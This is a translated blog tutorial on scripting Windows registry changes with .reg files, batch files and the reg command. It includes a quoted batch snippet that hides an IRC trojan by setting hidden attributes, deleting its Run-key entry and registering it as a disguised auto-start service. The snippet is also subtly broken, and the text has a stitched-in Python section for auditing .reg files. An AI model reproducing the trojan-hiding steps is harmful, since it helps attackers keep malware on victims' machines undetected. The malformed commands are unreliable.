I. Generating a .reg file from a batch file to operate on the registry
A batch file can easily generate a .reg file with the redirection operator. Then you only need to run the .reg file!
First, here is how to operate on the registry with a .reg file.
The first line of the .reg file must be Windows Registry Editor Version 5.00. The registry operations follow it.
(The file format is the same as that of a file exported from the registry.)
1. Create a subkey
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
A subkey named "TTT" is created under HKEY_LOCAL_MACHINE\SOFTWARE.
2. Create values
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
"Name"="ttt blog"
"EMail"="taoether@gmail.com"
"URL"="http://www.taoyoyo.net/ttt"
"Type"=dword:00000002
This creates four values under [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]: Name, EMail, URL, and Type.
Name, EMail, and URL are of type "String Value".
Type is a "DWORD Value".
(Appendix: windows registry value type:
REG_SZ string value
REG_BINARY binary value
REG_DWORD DWORD Value
REG_MULTI_SZ multi-string value
REG_EXPAND_SZ expandable string value)
3. Modify a value
Modification is relatively simple: export the value you want to modify, edit it in Notepad, and then import it again (regedit /s), just as when creating a new one. You can modify multiple values under the same subkey at once.
4. Delete a value
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
"EMail"=-
Run this script and "EMail" is deleted.
5. Delete a subkey
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
[-HKEY_LOCAL_MACHINE\SOFTWARE\DDD]
Run the script to delete the subkeys TTT and DDD.
6. Ways to execute a .reg file
1) Run the .reg file directly
2) regedit /s *.reg (/s means no confirmation is required)
3) reg import *.reg
7. In fact, a file with a .dll extension can also be used instead of a .reg file.
Batch processing example 1:
@echo off
rem The first line creates t1.reg with ">"; every later line appends with ">>"
echo Windows Registry Editor Version 5.00>t1.reg
echo.>>t1.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\TTT]>>t1.reg
echo "Name"="ttt blog">>t1.reg
echo "EMail"="taoether@gmail.com">>t1.reg
echo "URL"="http://www.taoyoyo.net/ttt/">>t1.reg
echo "Type"=dword:00000002>>t1.reg
rem Import silently, then remove the temporary file
regedit /s t1.reg
del /q t1.reg
pause
Batch processing example 2: (this example is from another user, not quite understandable ~~)
When we use some old trojans, they may generate a value under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (Runonce, Runservices, Runexec)] in the registry to start the trojan automatically. However, this easily exposes the trojan program's path, which leads to the trojan being detected and removed. It is relatively safer to register the trojan program as a system service. The following uses the configured IRC trojan DSNX as an example (named windrv32.exe):
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>patch.dll
@echo "windsnx"=->patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [Remove the DSNX startup item from the registry, use sc.exe to register it as a critical system service, set its attributes to hidden and read-only, and configure it to start automatically]
@REM is not safer.
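Because regedit /s imports without any confirmation and the file does not need a .reg extension, it helps to list what a file in this format would do before importing it. The following is an added example, not code from the original article: a small Python parser for the syntax described in items 1 to 5 that also flags operations on the Run-style autostart keys mentioned above. The names parse_reg, autostart_changes and SAMPLE are illustrative, and the sample input is constructed.

```python
import re
HEADER = "Windows Registry Editor Version 5.00"   # first line the article requires
# Autostart keys the article names (Run, RunOnce, RunServices, ...), in any hive.
AUTOSTART = re.compile(r"\\CurrentVersion\\Run\w*$", re.I)
VALUE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")\s*=\s*(.*)$')
# Constructed sample: the article's TTT/DDD operations plus a Run-key edit.
SAMPLE = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TTT]
"Name"="ttt blog"
"Type"=dword:00000002
"EMail"=-
[-HKEY_LOCAL_MACHINE\SOFTWARE\DDD]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windsnx"=-
'''

def parse_reg(text):
    """List the (action, key, name, data) operations a .reg file performs."""
    # Drop a BOM and join hex: data continued with a trailing backslash.
    lines = re.sub(r"\\\r?\n[ \t]*", "", text.lstrip("\ufeff")).splitlines()
    if not lines or lines[0].strip() != HEADER:
        raise ValueError("missing .reg header line")
    ops, key = [], None
    for raw in lines[1:]:
        line = raw.strip()
        if not line or line.startswith(";"):        # blank line or comment
            continue
        if line.startswith("[") and line.endswith("]"):
            deleting = line.startswith("[-")        # [-KEY] deletes the whole subkey
            key = None if deleting else line[1:-1]  # [KEY] creates/selects the subkey
            ops.append(("delete_key", line[2:-1], None, None) if deleting
                       else ("create_key", key, None, None))
            continue
        m = VALUE.match(line)
        if m is None or key is None:
            raise ValueError("cannot parse line: %r" % raw)
        name = "(Default)" if m.group(1) == "@" else m.group(1)[1:-1]
        data = m.group(2).strip()
        if data == "-":                             # "name"=- deletes one value
            ops.append(("delete_value", key, name, None))
        elif data.lower().startswith("dword:"):     # REG_DWORD, written in hex
            ops.append(("set_dword", key, name, int(data[6:], 16)))
        elif data.startswith('"'):                  # REG_SZ; undo \" and \\ escapes
            ops.append(("set_string", key, name, re.sub(r"\\(.)", r"\1", data[1:-1])))
        else:                                       # hex:, hex(2):, hex(7): kept raw
            ops.append(("set_other", key, name, data))
    return ops

def autostart_changes(ops):
    """Operations that touch a Run/RunOnce/RunServices-style key."""
    return [op for op in ops if AUTOSTART.search(op[1])]
```

Calling autostart_changes(parse_reg(SAMPLE)) returns the two operations on the Run key, which are the ones worth reviewing before a silent import.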
II. Operating on the registry with the reg command
The reg command is a dedicated registry tool provided by Windows. It makes it easy to query, add, delete, import, export, and compare registry data. For details, refer to the built-in help ......
REG Operation [parameter list]
Operation [ QUERY | ADD | DELETE | COPY |
SAVE | LOAD | UNLOAD | RESTORE |
COMPARE | EXPORT | IMPORT ]
1. Query all subkeys and values
D:\>reg query hklm\software\TTT
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\software\TTT
Name REG_SZ TTT BLOG
EMail REG_SZ taoether@gmail.com
URL REG_SZ http://www.taoyoyo.net/ttt/
Type REG_DWORD 0x2
2. Query a specific value
D:\>reg query hklm\software\ttt /v url
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\software\ttt
Url REG_SZ http://www.taoyoyo.net/ttt/
The most difficult part here is how to obtain the desired string. After a long time, I finally found the method.
In the past, there was no good way to use the find and for loops to intercept the content we needed. (If you cannot understand the example below, please refer to another article in this blog: DOS loop-bat/batch processing for command details 2)
For example, to obtain the value of url, http://www.taoyoyo.net/ttt/, you can use the following code:
@echo off
rem Tokens of the matching line: %%i = value name, %%j = type, %%k = data
for /f "tokens=1,2,3,4,*" %%i in ('reg query "HKEY_LOCAL_MACHINE\software\ttt" ^| find /i "URL"') do set "pURL=%%k"
echo The ttt blog url value is: %pURL%
Save it as test.bat. The running result is as follows:
D:\>test.bat
The ttt blog url value is: http://www.taoyoyo.net/ttt/
Note: I don't know why, but when my computer runs the "reg" command at the command line (including reg /?), CPU usage is 100%. In Task Manager, CMD occupies more than 80%. I don't know why ......
Running other commands, including regedit /s ......
I looked up the cause on the Internet, which said a trojan was at work, but a check found nothing. No relevant files were found, and no problem occurs when other commands are run ......
I'll leave it for now. I have a detailed explanation of the REG command at hand and will sort it out later!
Because of the virus check, I used my own Clear.bat to clean up the C drive, and it actually cleared 1 GB of space. There were only a few hundred megabytes left ...... There is so much Windows junk ~~ Don't forget to clean it up frequently!
I am also releasing two more batch files that automatically monitor Outlook Express. If you need them, click to download them ......
1. OEMonitorCount.bat function: resets the count of OE launches in the registry, to avoid the prompt to compact after more than 100 launches.
2. OEMonitorSize.bat function: monitors the size of Outlook Express mail files (*.dbx) and generates alarm logs when the size is greater than the specified size.
These two files can be added to the Startup group and run automatically at each startup!
These two files mainly aim to solve two common problems at the company:
1) Mail files are often more than a few GB in size;
2) Sometimes, emails may be lost after compacting as prompted.
I just found that the downloaded file is suffixed with "htm". Please remove this suffix before using it!
In addition, please use the following link for downloading, such as qianniu Telecom high-speed and qianniu Netcom high-speed. The VIP link above is intended for thousands of users ~~